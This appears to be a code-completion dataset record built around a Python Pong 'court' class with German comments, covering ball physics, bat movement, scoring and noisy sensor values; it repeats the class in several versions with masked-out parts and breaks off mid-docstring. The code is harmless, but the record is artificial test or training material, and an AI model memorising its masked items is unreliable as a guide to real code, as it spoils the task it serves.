# Wenn der Ortsvektor größer ist als x_max (hier vermutlich 16), dann hat er die Torauslinie
# von Spieler 1 überschritten
if self.posVec[0] > self.x_max:
# Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact) auf der Linie von
# Spieler (Y = self.x_max)
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + (factor * self.dirVec)
self.poi[1] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)
# Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:
self._bathit[1] = True # ... vermerke dies für z.B. hitbat(player)
else: # wenn jedoch nicht, dann...
self.Points[0] += 1 # ... Punkte von Spieler 0 (links) erhöhen
self._out[1] = True # und merken, das der Ball außerhalb des Spielfelds
# war, z.B. für out(player)
# Ball abprallen lassen, falls:
# -> Das infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition
# -> Der Schläger den Ball getroffen hat
if self.infinite or self._bathit[1]:
# 2 Spielfeldlängen - aktuellem X-Betrag ergibt neue X-Position
self.posVec[0] = 2 * self.x_max - self.posVec[0] # Einfallswinklel = Ausfallswinkel
self.dirVec[0] *= -1.0
self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten
else:
self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
# Wenn ein String, dann im Befehls-Modus:
if type(action) == str:
# Den Schläger nach oben bewegen
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
# Den Schläger nach unten bewegen
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
# Sonst im Setzen-Modus:
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2 # Der Schläger wird direkt auf die gewünschte Position gesetzt
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
def v_getPoint(self):
"""
visu-getter
:return: Liste [X,Y] des Punktestundes für Spieler 0 / 1
"""
return self.Points
|
flexible
|
{
"blob_id": "5485a1210a0c0361dbb000546ee74df725fad913",
"index": 5647,
"step-1": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n <mask token>\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n <mask token>\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n <mask token>\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n def v_getPoint(self):\n \"\"\"\n visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points\n",
"step-4": "<mask token>\n\n\nclass court:\n \"\"\"\n Objekt, dass das Spielfeld darstellt.\n\n Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:\n - Skalierte Daten für die KNNs\n - Unskalierte Daten für die Visualisierung\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n\n def __sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, Y-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 